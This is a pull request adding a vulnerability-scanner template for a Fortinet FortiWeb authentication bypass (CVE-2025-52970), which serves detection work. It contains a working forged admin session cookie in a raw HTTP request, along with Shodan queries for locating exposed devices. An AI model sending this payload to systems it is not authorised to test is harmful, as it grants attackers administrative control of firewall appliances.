### PR TITLE
feat: add CVE-2025-52970 Fortinet FortiWeb auth bypass template

### DIFF
--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -1,0 +1,53 @@
+id: CVE-2025-52970
+
+info:
+  name: Fortinet FortiWeb - Authentication Bypass
+  author: 0xbigshaq
+  severity: critical
+  description: |
+    Fortinet FortiWeb has a critical authentication bypass vulnerability. An out-of-bounds read in the cookie parsing code lets attackers set a special parameter that forces the server to use a predictable encryption key. This allows unauthenticated attackers to craft valid admin session cookies and gain full administrative access.
+  impact: |
+    Successful exploitation gives attackers complete administrative control over the FortiWeb appliance, enabling them to modify configurations, access sensitive data, and potentially compromise the entire network security.
+  remediation: |
+    Update FortiWeb to the latest version with the security fix applied. Contact Fortinet support for the specific patch that addresses CVE-2025-52970.
+  reference:
+    - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
+    - https://fortiguard.fortinet.com/psirt/FG-IR-25-448
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-52970
+    cwe-id: CWE-125
+    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fortinet
+    product: fortiweb
+    shodan-query:
+      - ssl:"cn=fortiweb"
+      - title:"FortiWeb - "
+  tags: cve,cve2025,fortinet,fortiweb,auth-bypass,oob,unauth,kev,vkev
+
+http:
+  - raw:
+      - |
+        GET /api/v2.0/system/status.systemstatus HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: APSCOOKIE_FWEB_8672793038565212270=Era=9&Payload=WBMi%2FLiqL9kMv5cas1WGGllbY2ehe9N98VN6szVLYhAfcAC%2BSFOpkVw5AbY2SgKP%0AEmAhJuYrSgJOaIPBUmz2rk%2F%2BfDhHldpZ8SGBG3NaeB2Rajs2rcsHwQ%3D%3D%0A&AuthHash=Bnbx%2BPlvdm9anOc2zabqhFZR36U%3D%0A
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'administrativeDomain'
+          - 'firmwareVersion'
+          - 'serialNumber'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a00473045022100a1659620f4f4ead3b8af97d5e9a0505c21cdd06699b9efc30c2e6790bfbc163b0220735e8faf93fdcfcd4b773c62b6fbc346379bdd66fa3a999e3cc2e132d26cd382:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
###  PR Information

fixes: #12947
 /claim #12947

- This template detects a serious security flaw in Fortinet FortiWeb devices. The vulnerability lets hackers bypass login security and gain admin access to web application firewalls without needing any passwords or special permissions. It's a critical issue that could let attackers take full control of network security systems.

- Added CVE-2025-52970 Fortinet FortiWeb Authentication Bypass template
- References:
  - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
  - https://fortiguard.fortinet.com/psirt/FG-IR-25-448

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

**How it works (simple explanation):**
The template tries to access a protected admin page on Fortinet FortiWeb devices using a specially crafted cookie. If the page returns system information instead of blocking access, it means the device is vulnerable to this authentication bypass attack.

**Why this matters:**
This vulnerability gives attackers complete control over web security systems, potentially allowing them to modify firewall rules, access sensitive data, or compromise entire network protections.